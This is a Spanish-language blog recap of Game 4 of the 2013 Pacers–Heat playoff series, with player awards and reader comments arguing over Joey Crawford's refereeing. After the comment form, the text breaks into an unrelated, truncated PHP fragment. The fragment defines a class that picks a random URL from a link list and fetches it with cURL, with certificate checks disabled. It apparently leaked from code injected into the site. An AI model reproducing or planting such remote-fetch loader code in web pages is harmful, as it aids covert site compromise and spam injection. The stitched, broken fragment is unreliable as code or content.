La Crónica: La fórmula del éxito

29 de May de 2013 por MagicJohnson32

HibbertSe va a hablar del arbitraje, de la ineptitud de Joey Crawford, de la sexta falta de LeBron a 0:56 para el final, de los pasos de Wade en la siguiente posesión y de otras muchas decisiones controvertidas. Se hablará tanto de eso que puede que perdamos de vista que Pacers y Heat nos están brindando una serie magnífica, y que Roy Hibbert elevó a su equipo de nuevo al triunfo (92-99) para poner el 2-2 y asegurar que ambos equipos regresarán a Indianapolis para el sexto partido.

Tras el repaso mayúsculo recibido en el Game 3, era el turno de Vogel y los Pacers de corregirse y devolver la eliminatoria a las constantes que había seguido en los dos primeros encuentros. Eso pasaba por contrarrestar los posteos de LeBron e intensificar el dominio interior y reboteador, única fórmula que puede conducir al éxito de los Pacers en este duelo. Lo primero lo consiguieron por medio de ayudas defensivas; lo segundo fue por obra y gracia de Hibbert, cuya presencia e impacto bajo los aros no hicieron más que agrandarse conforme transcurrieron los minutos.

De entrada, los Pacers mostraron no tiraban la toalla tras la última derrota. Empezaron con un 0-11 ante el que los Heat necesitaron unos minutos para reaccionar. Lo hicieron a través de la faceta más anotadora de LeBron James, autor de 9 puntos en el primer cuarto que permitieron a los suyos seguir a duras penas el acelerado paso de los Pacers (18-20). El segundo periodo se abrió con Lance Stephenson atacando a Ray Allen, desbordado toda la noche frente a la agresividad del neoyorquino. El regreso a pista de Hibbert tras unos minutos de descanso reforzó el dominio local y elevó la renta a 9 puntos (34-43) pero la aparición de Chalmers desató un muy buen final de cuarto por parte de los Heat, que con una bandeja de James dejaron el tanteo prácticamente igualado en el intermedio (47-48).

En la reanudación Chalmers siguió anotando y sonaron las alarmas para los Pacers cuando se vieron 6 abajo (60-54). El dominio reboteador de Indiana se materializó entonces con 4 capturas ofensivas consecutivas en un parcial de 0-10 liderado por David West que devolvió el mando del partido a los Pacers. Un extraordinario triple de Stephenson sobre la bocina cerró el tercer cuarto con 70-77 y la sensación de que el 2-2 estaba más cerca.

Sin embargo, la ventaja no sería ni mucho menos definitiva. Después de que Hibbert pusiera el 72-81, los Heat se lanzaron a un parcial de 14-2 que dejó la fe de la grada pendiendo de un hilo. No sabían que, tras un triple brutal de Ray Allen (89-86) a 5:12 para el final, los Heat anotarían únicamente una canasta y Roy Hibbert se elevaría como el gigante que es para atrapar tres rebotes ofensivos, anotar 5 puntos consecutivos y sellar la victoria de los Pacers, no sin que antes Joey Crawford & Co. dejasen su sello. Los Heat pueden lamentarse de algunas decisiones arbitrales (también las hubo beneficiosas para ellos) pero no tienen más remedio que asumir que la derrota tuvo mucho más que ver con su inferioridad en el rebote (30-49), con su 39% en tiros de campo por el 50% de los Pacers y con el rendimiendo de Wade y Bosh, que fallaron 15 de sus 21 tiros y se quedaron en 6 rebotes entre ambos.

PREMIOS

MVP: Los Heat no encontraron respuestas a Roy Hibbert (23 puntos, 10/16 en tiros y 12 rebotes), sobre todo en el último cuarto. El pívot de los Pacers anotó 7 puntos y capturó 3 rebotes ofensivos claves para que su equipo se llevara la victoria.

lebronSorpresa: Sosegado y calmado, Lance Stephenson es un pedazo de jugador. Ayer anotó 20 puntos (9 de 15 en tiros de campo), de los que destaca un triplazo en el último segundo del tercer cuarto que situaba a los Pacers 7 arriba.

Decepción: Dwyane Wade y Chris Bosh, las otras dos patas del Big Three, cojearon anoche ostensiblemente. Wade anotó 16 puntos pero con un 5 de 15 en tiros de campo. Bosh se quedó en 7 puntos y 3 míseros rebotes, y la lesión de tobillo de que le mandó durante unos minutos al vestuario no es excusa para su pobre producción.

Esfuerzo en vano: LeBron James (24 puntos, 6 rebotes, 5 asistencias y 3 tapones) nunca falla. Esta vez la principal colaboración le llegó de la mano de Mario Chalmers, que anotó 20 puntos y tuvo un +11 durante sus 29 minutos de juego.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Para mi Lebron James no debería ser esfuerzo en vano, pero como es el que mejores estadísticas tiene, lo puedo entender.

    Estuvo todo el partido sobreexcitado y tomando decisiones absurdas. Pegándose con Stephenson sin balón, después soltando el codo a David West, y la falta ofensiva para mí es clarísima, va a hacer la pantalla, en movimiento, y alargando la pierna para que se tropiece… muchos gestos también de desesperación en James, veremos si ha sido sólo un partido o si ésta va a ser la tónica. Además tampoco está defendiendo muy bien, ya son varias las veces que George le desborda y penetra muy fácil para machacar…

    Mal Wade y mal Bosh, aunque lo peor fue los 6 tiros de los que disfrutó únicamente este último.

      Citar

  2. GreenPride dice:
    #2

    Pues los Pacers resisten y vuelven a igualar las series contra los campeones.
    Tras su mal tercer partido en el que olvidaron muchos de sus puntos fuertes los Pacers volvieron claramente a tener claros sus puntos fuertes: Cargaron el rebote todo lo que pudieron (+19) ralentizaron el juego de ataque cuando no había contraataque buscando posiciones interiores o penetraciones que provocaran tiros libres o rebotes ofensivos e impidieran correr a los Heat, doblaron marcaje a LeBron cuando iniciaba el bote en el poste para evitar los problemas del tercer partido y se las apañaron para incomodar a Wade y Bosh haciéndo ambos un partido más que discreto. Con todo ello, aún tuvieron que luchar hasta el final y beneficiarse de alguna decisión dudosa para ganar el partido.
    Sobre las acciones dudosas, para mí la sexta de LeBron es claramente falta, no veo pasos de Wade pero una fuera de Ray Allen se la dieron a los Heat porque supuestamente había tocado West (yo vista la jugada 30 veces no veo que toque en West ni de broma). Así que decisiones polémicas pero creo que no decisivas.
    Lo decisivo fue que tras un triple imposible de Allen (uno de los pocos que mete ahora) los Pacers dominaron el final del encuentro a base de atacar el aro con un 2+1 de George y tres rebotes de ataque consecutivos de Hibbert que dominó bajo los aros ese final de partido.
    Un triple de James todavía dejó una oportunidad a los Heat que acabaron cayendo. Esta vez el Big Three de Miami no estuvo tódo lo sólido que debe y fue Chalmers el que ayudó a LeBron para mantener a los Heat. Con los Pacers muy bien en las ayudas sin descuidar esta vez su rebote defensivo (Andersen 0 puntos) ni los tiros abiertos de Haslem los de Indiana llevaron el partido por debajo de 100 puntos y en un ritmo mucho más acorde a lo que necesitan para poder ganar a los de Florida.
    Ahora la serie vuelve a Miami y no nos engañemos la ventaja sigue siendo para los campeones. En su cancha los Heat deberían imponer su estilo rápido y agresivo en el decisivo 5º partido pero la mala serie de Wade hace que necesiten o bien un partido enorme de Bosh o que sus otros jugadores anoten. En el tercero fueron Haslem y Andersen y lo que les está fallando claramente son los triplistas. Ni Allen, ni Battier ni Haslem están consiguiendo anotar sus tiros de lejos lo que permite a los Pacers cerrarse mucho sobre las penetraciones de Wade y LeBron. Las claves siguen claras. Para los Pacers dominar el rebote, no perder balones, cargar el juego interior al máximo y ralentizar el ritmo cuando no haya opciones claras. Para los Heat, intentar abrir la defensa de los Pacers con tiro y buenas circulaciones de balón que permitan penetraciones más claras a LeBron, minimizar el dominio interior de los Pacers (¿Llego la hora de Joel Anthony?), contar con vías de anotación alternativas a LeBron e intentar que se juegue más rápido y fluido y con más lanzamientos.
    Quitando el tercer partido la serie está siendo preciosa. Esperemos que Indiana salga a por todas en el 5º y ver un partido memorable

      Citar

  3. HisRoyalAirness dice:
    #3

    El bloqueo ilegal de Lebron es clarísimo. Es más, es que le pisa.

      Citar

  4. Lucho dice:
    #4

    También le quitaron un doble válido a los Pacers faltando unos 5 minutos. Cobraron posesión de 24 terminada pero la pelota había tocado aro antes y correspondia una posesión completa. Igualmente estoy de acuerdo en que Indiana fue ayudado en elnultimo minuto.
    Ahora bien levante la mano el que antes que empiecen los PO pensaba que los Heat iban a jugar mas partidos que el campeón del oeste…

      Citar

  5. rumbero dice:
    #5

    Puesto que ya está todo más o menos dicho entre la crónica y GreenPride yo si voy a rajar de Crawford porque me toca soberanamente los eggs que con una serie tan bonita tenga que aparecer este tio y su afán de protagonismo. Ya ni entro a valorar si perjudica a unos o otros…es que el tio viene directamente a montar su númerito. Ahora le quito un par de puntitos a Indiana por final de posesión, balón para Miami cuando es out of bounds de Allen, me cargo a Lebron que al tio no lo echan nunca (espera a ver que piense…la última vez que lo echaron fue en el Game4 de las ECF del año pasado…calla que arbitraba yo también) y ya para matar de todo el final del partido me voy al replay y me veo el final del último de GoT que me quedé frito en el sofá. Ya cansas Crawford.

      Citar

  6. Denise dice:
    #6

    Acordaos que el payaso este fue el que se cargó el 6º partido entre Memphis y Clippers, desquiciando a los angelinos con faltas y técnicas cada dos por tres.

      Citar

  7. Laker1624 dice:
    #7

    La impresión que tengo sobre esta serie es que cuando los Pacers consiguen llevar los partidos a su terreno hay bastante igualdad entre ambos equipos. En cambio, cuando Miami ha conseguido imponer su estilo, cosa que solo ha logrado hacer bien en el tercer encuentro en mi opinión, la diferencia a favor de Miami ha sido notable. Supongo que esto se debe a la diferencia de calidad que hay entre ambos equipos. Pienso que Indiana debería explotar aun más su juego interior en ataque e intentar “abusar” de los Heat en la pintura. Creo que si George mejora su rendimiento de cara a los próximos encuentros respecto a su partido de hoy le pueden complicar más las cosas a Miami. Por parte de Stephenson, creo que se puede tratar de un buen jugador, pero me parece algo irregular y que debe mejorar su selección de tiro y tomar mejores decisiones en tramos puntuales. Pienso que es un jugador que no sabe ver bien que ritmo de juego le conviene a su equipo durante el transcurso de los partidos.

      Citar

  8. Esteban dice:
    #8

    la sexta falta de james es clara, si se mira bien al ir a meter la cortina su pie llega tarde y termina pisando al defensor de indiana

    a no llorar

      Citar

  9. Esteban dice:
    #9

    Lucho:
    También le quitaron un doble válido a los Pacers faltando unos 5 minutos. Cobraron posesión de 24 terminada pero la pelota había tocado aro antes y correspondia una posesión completa.Igualmente estoy de acuerdo en que Indiana fue ayudado en elnultimo minuto.
    Ahora bien levante la mano el que antes que empiecen los PO pensaba que los Heat iban a jugar mas partidos que el campeón del oeste…

    es muy cierto, sucede q entre tanto te olvidas la jugada pero esa fue clarisima

    la falta de lebron es foul

    la bola se le va a ray allen y se le dan a miami y compensando al otro lado, le cobran pasos inexistentes a wade

    fin de la historia, 0 incidencia el referato

      Citar

  10. Sancho88 dice:
    #10

    Que conste que voy con un game de retraso, pero efectivamente, Esteban tiene razón. 0 incidencia real de Crawford en el resultado. Sí, hace cagadas por hacerse el protagonista, pero eso no quita que Indiana fuese el justo ganador del cuarto juego. Sobre lo que dices Denise, ese partido de las técnicas, a los Clippers se les fue la olla y empezaron a repartir mamporros por todos lados, no creo que fueran injustas la mayoría de las técnicas de Crawford. También sacó alguna a Memphis si mal no recuerdo.

    Realmente, como ex árbitro, lo que sí me sorprende más del arbitraje NBA, y cada día es un cancer que se va expandiendo más hacia Europa, es la tendencia a pitar faltas en ataque en todos los bloqueos. Artistas del flopping como Stephenson son agraciados con faltas recibidas cuando el problema lo han tenido en el desplazamiento lateral. En fin, es un concepto que no acabo de entender, ya que en el bloqueo ofensivo no permiten ya nada (muchas de las faltas de Lebron en este cuarto) y cada dos por tres hay faltas en ataque en bloqueos indirectos que en muchas ocasiones no trascienden en la finalizacion de la jugada, o en bloqueos directos donde hay flooppers profesionales como Stephenson. Ahí, para mí, sí que la NBA está cometiendo una negligencia, en ese abuso de pitar faltas en ataque. Sobre Crawford, creo que ya está todo dicho, pero personalmente no veo que influyera a favor de Indiana. De hecho, como bien comentais, también quita una canasta a Stephenson en el último cuarto. La expulsión de Lebron puede ser, no es un ser sagrado que no haga faltas, que las hace, pero se las deberían pitar más en los contactos que no sean bloqueos. Esa es mi opinión.

    Y sobre Stephenson, muy de acuerdo que su IQ no es la más elevada de Indiana, pero coño, cuando quema la patata, como dicen en Suramérica, este tío nunca se arruga. Decisiones malas toma, eso está claro, pero su determinación en el 1×1 es de lo más brutal en toda la liga, y a veces George se esconde y tienen que salir Stephenson y Hibbert a jugárselas en ataque, así como West y Hill. Para mí, si George no jugase en Indiana, su impacto se reduciría, no es un verdadero jugador franquicia en ataque. En eso tiene que evolucionar, en todo lo demás, un genio

      Citar

  11. Esteban dice:
    #11

    Sancho88: steban tiene razón. 0 incidencia real de Crawford en el resultado. S

    Comparto totalmente sancho, lo puse en el analisis, GEORGE puede ser un exelente acompañante de una estrella, pero sus recursos ofensivos lo dejan lejos de las verdaderas estrellas de la liga
    si sigue puliendo si tiro de 3 y aprende a postearse gracias a su altura y alli ser determinante, podria ser visto como un jugador franquicia, hasta ahora, hace muchas cosas bien en ofensiva pero pocas de modo exelente

      Citar

  12. Jose Luis dice:
    #12

    Pues para mí es una alegría que piten de vez en cuando una falta en ataque en bloqueo, porque es increíble la de bloqueos ilegales que hacen.

    Lo que no me gusta es que piten dos consecutivos (o casi), uno para cada equipo, sólo por compensar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>